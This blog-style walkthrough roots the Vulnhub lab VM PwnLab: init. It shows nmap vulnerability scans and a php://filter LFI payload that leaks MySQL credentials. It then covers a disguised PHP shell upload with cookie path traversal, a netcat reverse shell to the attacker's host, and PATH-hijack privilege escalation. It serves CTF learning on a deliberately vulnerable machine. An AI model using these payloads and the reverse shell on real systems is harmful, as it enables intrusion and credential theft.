PwnLab: init, Vulnhub Machine Walkthrough

Lets root Pwnlab: init Machine from Vulnhub today.

Start by finding out the IP through nmap.

nmap -sn 192.168.18.0/24

We have the IP now, 192.168.18.100

Time for a deeper scan.

nmap -p- -A -T5 -sV -O --script vuln  192.168.18.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 08:35 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.100
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.18.100
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.18.100:80/?page=login
|     Form id: user
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.10: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3583   5.0     https://vulners.com/cve/CVE-2014-3583
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
111/tcp   open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38626/tcp   status
|   100024  1          39233/udp6  status
|   100024  1          52116/udp   status
|_  100024  1          57067/tcp6  status
3306/tcp  open  mysql   MySQL (blocked - too many connection errors)
38626/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:CF:29:7D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.97 ms 192.168.18.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 372.01 seconds

We have a website running on the server. Lets have a look.

A login Page, Lets try SQL Injection.

Unfortunately it didn’t work. But, Have a look at the login page URL.

http://192.168.18.100/?page=login

Is there an LFI?

I tried but could’nt find any. Then I came across this article.

https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

Lets try this on config.php.

http://192.168.18.100/?page=php://filter/convert.base64-encode/resource=config

We got something in base64.

Lets decode this with https://www.base64decode.org/

Now we have the credentials to login to the MySQL server.

Lets try to login.

mysql -u root -h 192.168.56.101 -pH4u%QJ_H99

I got an error at first, but fixed the issue with a reboot of the VM.

Lets read the data now.

show databases;

Lets find the tables and the data inside them.

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.005 sec)

Here, we have 3 users. Looks like the password is base64 encoded. Lets decode kent’s password.

It is JWzXuBJJNy.

Lets login as kent.

Lets try to upload a php shell.

Lets try to send this as jpg with Burp.

Change the filename to photo.gif, content type to image/gif and add GIF87a in the first line.

We can find our file location in response filed in Burp.

Our file is uploaded, but we cant read the file. But read the index.php through the above method.

Here, a ‘lang‘ cookie is added to load ‘en.lang.php‘ file.

Lets try changing the value to something else.

Go to Firefox Preferences > Web Developer > Storage. Add + button at the top right to add a cookie.

Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif

and now.

We got the file included.

Now lets open a reverse shell with netcat. Enter this command in the page.

nc -nv 192.168.18.99 4444 -e /bin/bash

We got a connection.

Now, We have the passwords for three users. Lets examine their home directories.

Nothing special here.

Mike’s password doesnt work. Letr try kane.

There is a file owned by mike. Lets open.

Ah! Couldnt read. What kind of file this is?

Executable. Lets try running.

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory

This executable tries to read msg.txt from mike’s home directory. Means the executable cat have access to mike’s home directory and we don’t have. Right?

What about changing the PATH variable and running /bin/bash with the same privileges as cat? Let’s try.

kane@pwnlab:~$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
kane@pwnlab:~$ chmod +x /tmp/cat
chmod +x /tmp/cat
kane@pwnlab:~$ PATH=/tmp:$PATH
PATH=/tmp:$PATH

Now let’s run the executable file.

We are mike now!

Lets have a look at mike’s home directory.

There’s a file called msg2root.

We are sending a message to root. So as the previous file, an executable have access to root folder too.

Lets try another method.

We are root.

Lets read the flag now. Before that we need to copy the real cat file to our /tmp/cat.

Cheers!